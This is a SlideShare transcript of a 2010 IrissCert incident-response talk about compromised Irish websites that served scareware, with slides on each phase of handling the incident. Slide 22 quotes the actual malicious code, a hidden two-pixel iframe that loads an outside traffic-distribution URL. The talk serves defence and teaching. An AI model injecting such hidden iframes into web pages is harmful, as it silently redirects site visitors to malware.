Scareware Traversing the World via Ireland

959 views

Published on

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
959
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Scareware Traversing the World via Ireland

  1. 1. Scareware Traversing the World via an Irish Web Exploit Mark Hillick (@markofu) IrissCert Incident HandlerFriday 17 September 2010
  2. 2. Presentations 99%Friday 17 September 2010
  3. 3. IrelandFriday 17 September 2010
  4. 4. Ireland CSIRT/CERT?Friday 17 September 2010
  5. 5. EuropeFriday 17 September 2010
  6. 6. Introducing IRISS Volunteer handlers Local Security Professionals Weekly handler shifts Not-for-profit organizationFriday 17 September 2010
  7. 7. What do we see?Friday 17 September 2010
  8. 8. How do users feel? 2/3 have been victims < 10% feel very safe 97% expect to be victims Law Enforcement & Businesses lack resourcesFriday 17 September 2010
  9. 9. Why we’re here!Friday 17 September 2010
  10. 10. ALERTS IRISS customFriday 17 September 2010
  11. 11. ScarewareFriday 17 September 2010
  12. 12. $$$$ FBI -> $150 millionFriday 17 September 2010
  13. 13. How easy? Very :-(Friday 17 September 2010
  14. 14. GrowthFriday 17 September 2010
  15. 15. Scareware EvolvingFriday 17 September 2010
  16. 16. Remember Zen and the art of incident handling ...Friday 17 September 2010
  17. 17. ReactionsFriday 17 September 2010
  18. 18. ReactionsFriday 17 September 2010
  19. 19. ReactionsFriday 17 September 2010
  20. 20. Identification Gather information Analysis DetermineFriday 17 September 2010
  21. 21. Identification - Vector Legitimate WebsitesFriday 17 September 2010
  22. 22. Identification - WA Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/ tds_a/go.php/go.php?id=4" /></body>Friday 17 September 2010
  23. 23. Identification - iframeFriday 17 September 2010
  24. 24. Identification - WA DNS requests HTTP • Gets • Posts ScriptsFriday 17 September 2010
  25. 25. Identification - SWFriday 17 September 2010
  26. 26. Identification SWFriday 17 September 2010
  27. 27. Identification - SWFriday 17 September 2010
  28. 28. Identification - SWFriday 17 September 2010
  29. 29. Identification - Analysis Exploited Sites hosted on one server Weak FTP passwords (e.g. Ghost61) Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL InjectionFriday 17 September 2010
  30. 30. Containment Verify Stop the Spread • Remove • Notify • Inform Blackhole Source: Profound Whatever - Flickr Creative CommonsFriday 17 September 2010
  31. 31. Eradication Remove Improve Vulnerability Analysis RestoreFriday 17 September 2010
  32. 32. Eradication - How?Friday 17 September 2010
  33. 33. Eradication - Hosting Struggle but...Friday 17 September 2010
  34. 34. Recovery Source: Dilbert ©2009, United Feature Syndicate, Inc.Friday 17 September 2010
  35. 35. Recovery - Be Sure! Validate, Restore & MonitorFriday 17 September 2010
  36. 36. Lessons LearnedFriday 17 September 2010
  37. 37. Lessons Learned Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation ProcessFriday 17 September 2010
  38. 38. Lessons Learned Awareness Back-up & test the restore ;-) Patch Test website for vulnerabilities & exploits Defence-in-depth Free Local & Online tools for safer browsing& analysisFriday 17 September 2010
  39. 39. Lessons Learned “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” Jeremiah Grossman (Feb. 2010)Friday 17 September 2010
  40. 40. Lessons Learned - Prep Fail to Prepare, well you know the rest :)Friday 17 September 2010
  41. 41. Scareware Evolution source: http:// www.f-secure.comFriday 17 September 2010
  42. 42. What do you use?Friday 17 September 2010
  43. 43. go raibh mile maith agat Twitter @markofu @irisscert @hackeire #irisscon Google-Fu “scareware site:sans.org” Unless states, source of images -> Flickr Creative Commons, iStockPhoto or my own!!Friday 17 September 2010
  44. 44. Well......Friday 17 September 2010

×